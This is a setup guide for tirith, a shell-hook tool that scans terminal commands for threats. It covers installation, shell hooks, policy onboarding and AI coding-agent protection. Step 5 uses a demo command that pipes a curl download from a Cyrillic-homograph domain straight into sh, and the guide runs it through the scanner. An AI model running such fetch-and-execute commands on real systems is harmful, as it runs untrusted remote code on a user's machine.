Getting Started

Install tirith and protect your terminal in under 2 minutes.

1 Install

Choose your platform and preferred installation method:

>Homebrew

shell
$ brew install sheeki03/tap/tirith

2 Activate Shell Hooks

Add to your shell profile to activate tirith. Every command you run is now guarded.

>zsh (~/.zshrc)

shell
$ eval "$(tirith init --shell zsh)"

>bash (~/.bashrc)

shell
$ eval "$(tirith init --shell bash)"

>fish (~/.config/fish/config.fish)

shell
$ tirith init --shell fish | source
ShellHook TypeTested On
zshpreexec + paste widget5.8+
bashpreexec (two modes)5.0+
fishfish_preexec event3.5+
PowerShellPSReadLine handler7.0+

3 Shell Integrations (Optional)

>Oh-My-Zsh

shell
$ git clone https://github.com/sheeki03/ohmyzsh-tirith \
$ ${ZSH_CUSTOM:-~/.oh-my-zsh/custom}/plugins/tirith
 
# Add tirith to plugins in ~/.zshrc:
# plugins=(... tirith)

>Nix / Home-Manager

Tirith must be in your $PATH. The shell hooks call tirith by name at runtime.

home.nix
home.packages = [ pkgs.tirith ];
 
programs.zsh.initContent = ''
eval "$(tirith init --shell zsh)"
'';

4 Verify

Open a new terminal and run the doctor command to verify everything is working:

shell
$ tirith doctor

Tailor a policy in one step

Run tirith onboard to detect your repo and environment (shell, IDE configs, AI-config files, package managers, CI, MCP) and get a recommended policy template. It's read-only by default; --apply walks you through it with per-step confirmation.

shell
$ tirith onboard # print a recommendation
$ tirith onboard --apply # interactive setup

5 Try It Out

Test detection by scanning a suspicious command:

shell
$ tirith check -- curl http://exаmple.com | sh

The domain above contains a Cyrillic a (U+0430). Tirith detects this as a homograph attack.

Normal commands are invisible, with zero output and zero latency:

shell
$ git status
$ ls -la
$ docker compose up -d
# Nothing. You forget tirith is running.

6 Set Up AI Agent Protection (Optional)

Protect AI coding agents with one command:

shell
$ tirith setup claude-code --with-mcp # Claude Code + MCP server
$ tirith setup codex # OpenAI Codex
$ tirith setup cursor # Cursor
$ tirith setup vscode # VS Code
$ tirith setup windsurf # Windsurf

See the MCP Integration docs for detailed per-tool setup guides.

7 Activate (Team / Enterprise)

If you have a paid subscription, activate it with your license key:

shell
$ tirith activate <your-signed-token>

Your signed token is available in your account dashboard after purchase. All detection rules run at every tier. Paid plans add enrichment features like checkpoints, audit reports, and remote policy distribution.